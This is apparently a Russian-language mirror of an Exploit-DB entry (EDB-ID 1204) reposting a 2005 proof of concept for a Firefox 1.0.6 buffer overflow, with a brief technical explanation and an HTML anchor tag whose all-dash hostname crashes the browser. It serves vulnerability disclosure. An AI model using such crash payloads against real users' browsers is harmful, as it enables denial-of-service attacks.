- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1204
- Проверка EDB
-
- Пройдено
- Автор
- TOM FERRIS
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2005-09-09
HTML:
<!--
Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String
Formatted for your tesing /str0ke
Tom Ferris
www.security-protocols.com
Versions Affected:
Firefox Win32 1.0.6 and prior
Firefox Linux 1.0.6 and prior
Firefox 1.5 Beta 1 (Deer Park Alpha 2)
Technical Details:
The problem seems to be when a hostname which has all dashes causes the
NormalizeIDN call in nsStandardURL::BuildNormalizedSpec to return true,
but is sets encHost to an empty string. Meaning, Firefox appends 0 to
approxLen and then appends the long string of dashes to the buffer
instead. The following HTML code below will reproduce this issue:
String:
<A HREF=https:--------------------------------------------- >
-->
<A HREF=https: >
# milw0rm.com [2005-09-09]- Источник
- www.exploit-db.com
